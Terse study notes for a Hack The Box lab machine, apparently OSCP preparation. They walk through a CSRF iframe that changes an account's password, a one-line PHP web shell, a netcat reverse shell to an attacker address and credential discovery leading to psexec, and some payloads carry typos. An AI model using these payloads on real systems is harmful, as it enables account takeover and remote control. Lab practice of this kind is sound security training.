OSCP Notes
Comment on page

HTB Secnotes -SQL injection & CSRF

xss vuln ---
What requests are being sent?
direct URL? --> put "http://Attackers_IP:9001" in a comment section and see what it does!
nc -nvlp 9001
got a connection back!
create a test page
<iframe> src="http://Attacker_IP/change_pass.php?password=gori&confirm_password=gori&submit"><iframe>
host the page on pythom httpserver and see what it does --> does the link actually work?
if it works, this would change the password of the particular user account like admin's
IIS server open and you have a smb share access on the web root.
try to create a web shell and upload it > access it!
<?php system($REQUEST['ippsec']) ?>
RCE confirmed?
Uploading nc.exe (googling nc64.exe) tends to get a stable shell on windows!
nc.exe attacker_IP 9001 -e powershell
lnk found?
get-content ~.lnk
admin password was hidden inside of it > psexec win!